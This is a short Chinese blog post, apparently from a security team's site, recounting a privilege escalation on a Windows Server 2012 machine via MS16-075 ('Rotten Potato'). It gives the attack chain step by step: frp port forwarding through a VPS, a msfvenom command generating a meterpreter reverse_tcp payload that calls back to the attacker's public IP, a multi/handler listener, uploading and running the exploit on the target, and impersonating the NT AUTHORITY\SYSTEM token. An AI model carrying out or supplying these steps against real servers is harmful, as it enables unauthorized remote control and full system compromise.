记一次ms16075邪恶土豆提权windows2012服务器过程

/ 507 次浏览/ 核心成员

记一次ms16075邪恶土豆提权windows2012服务器过程


QQ截图20210128141422.png


匿名权限


图片1.png



2012服务器


服务器系统是window2012

需要准备一台vps公网服务器,和一台kali虚拟机进行映射通信

kali设置frp代理规则


图片2.png

server填写公网服务器IP

然后在在VPS启动frp


图片3.png


Kali转发6666到公网的1234端口配合MSF进行反弹

开启kali的frp


图片4.png


MSF生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=6666 -f exe > /.exe


图片5.png


使用msf模块进行监听 multi/handler


上传ms16075文件,到目标服务器运行

Msf反弹成功


图片6.png


通过potato进行提权


提权命令:impersonate_token "NT AUTHORITY\SYSTEM"

发现提权成功


图片7.png



登录目标服务器



图片8.png



图片9.png


<< 上一篇

old Team getshell上传工具

下一篇 >>

记一次靶机漏洞的getshell逻辑代码分析过程

相关文章